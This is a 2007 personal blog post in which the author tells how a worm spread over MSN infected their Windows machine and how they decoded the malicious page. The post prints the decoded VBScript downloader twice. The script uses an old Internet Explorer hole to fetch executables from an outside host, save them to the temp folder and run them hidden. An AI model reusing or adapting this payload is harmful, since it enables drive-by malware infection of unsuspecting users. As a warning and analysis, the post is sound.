Search This Blog

Sunday, April 29, 2007

Catching a worm

Peace be upon you

it was a tough day to me, :D I was installing windows and other things that I used to use on my machin, anyways the first thing I do after installing windows is to install MSN, I got Message from someone very imortant to me, he/she sends me a link

http://th ecool pics.net/don tclick.jpg

DOn't OPEN THIS LINK IT HAS THE WORM


I opened the link, and I noticed it cause a very dilay on my machin, I said to my self wait for a second to see what is coming, nothing the page was so normal, after while I tried to open "RUN" and I found that it is "Restricted", also the Task Manager,
I used "Process Explorer" and I found that there is a very strange processes, I got MAD, WORM ON MY MACHIN, of course I tried all the old tricks, Safe mode and try to restore and workin restore point, but NOWAY, they guy who made it is very clever, he expected what I am going to do and he / she deleted my restore application :D, for his/her bad luck that I always have a running copy of windows that I don't touch, I use it only for emargance, :D I got a copy of the system restore applicaiton and I get back to clean working point :D, and I decide to know what is the hell is going on :D
I got the like that I mentioned before, I downloaded the image and I found that it is redirect to some other place that redirect ot ver far place :D , at last I got this code



of course anyone know Javascript will know esacp and unescap functions, I did a very simple page that unescae this content and put it in TextArea, and I found a very nice simple code for encrypting the content "dF(s)" this was the function name, I did anther Textarea to put the output of the Textarea , and what I saw make me get shocked :D, simply I don't update my internet explorer for this stupid exploit

I got the code that copies the worm to my machin

and here it is





< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&amp;a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

now after I got this simple javascript code that copies a stupid executable and run it on my machin, I have downloaded this file and I open it with Notepad :D don't laugh I don't have anything now on my HD, I found that it is encrypted , I searched for the file name with the beloved google and I foun this link that tells a lot about the virus
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T

I wish this topic useful to you, and I want to say something at last "DO N'T TRUST SOMETHING U DON'T SEE, remember there is opictal illusion :D so Don't trust anything :D"

No comments:

There was an error in this gadget